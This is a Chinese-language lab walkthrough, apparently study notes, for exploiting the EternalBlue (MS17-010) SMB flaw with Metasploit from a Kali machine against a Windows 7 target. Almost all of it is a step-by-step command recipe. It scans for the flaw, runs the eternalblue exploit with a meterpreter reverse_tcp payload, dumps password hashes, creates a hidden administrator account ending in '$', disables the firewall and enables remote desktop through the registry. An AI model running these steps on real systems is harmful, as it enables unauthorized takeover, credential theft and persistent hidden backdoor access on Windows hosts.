准備:
kali為攻擊機,ip:172.17.2.132
win7為靶機, ip:172.17.2.64
使用msf模塊。需要在同一局域網中。
步驟:
1.啟動數據庫服務
service postgresql start

2.開啟msf
3.搜索永恆之藍
4.使用永恆之藍ms17-010漏洞
use auxiliary/scanner/smb/smb_ms17_010

5.查看選項
show options

6.查看靶機ip地址
172.17.2.64
7.設置rhosts為靶機地址
8.運行run
9.掃描具體的ms17_010(永恆之藍漏洞)
search name:ms17 type:exploit

10.選擇第0個。
use exploit/windows/smb/ms17_010_eternalblue
10(1)如果目標為win2003,則選擇
use exploit/windows/smb/ms17_010_psexec
11.查看需要配置的選項。
12.設置rhosts為靶機ip。

13..顯示攻擊載荷。
14.選擇設置windows/x64/meterpreter/reverse_tcp的攻擊載荷
set payload windows/x64/meterpreter/reverse_tcp

15.再次查看配置。
16.檢查無誤后運行
17.運行成功,連接上。help或者?可以打開幫助。
18.getuid,獲取靶機賬戶
19.查看靶機的用戶名及密碼,可以看到cover為賬戶,:后的md5為密碼。
如果md5破解不出,可以添加賬戶。
19. shell.

20.看到出現亂碼了,chcp 65001 可以解決。
21.net user,查看用戶
22.添加qwer用戶 密碼為123456789
22(1)
添加隱藏賬戶
net user test$ 123456 /add
提權至管理員賬戶
net localgroup administrators test$ /add
注:
用戶名要以$結尾
添加后,該帳戶可在一定條件下隱藏,輸入net user
無法獲取
23.將qwer提至管理員權限。

關閉防火牆
命令:netsh firewall set opmode mode=disable
查看防火牆狀態:netsh firewall show state
24.安裝遠程桌面軟件
apt-get install rdesktop
24.REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 打開3389遠程連接端口
25.在命令符中輸入
rdesktop 172.17.2.64 進入遠程連接。

隱藏賬戶要加入$

連接成功。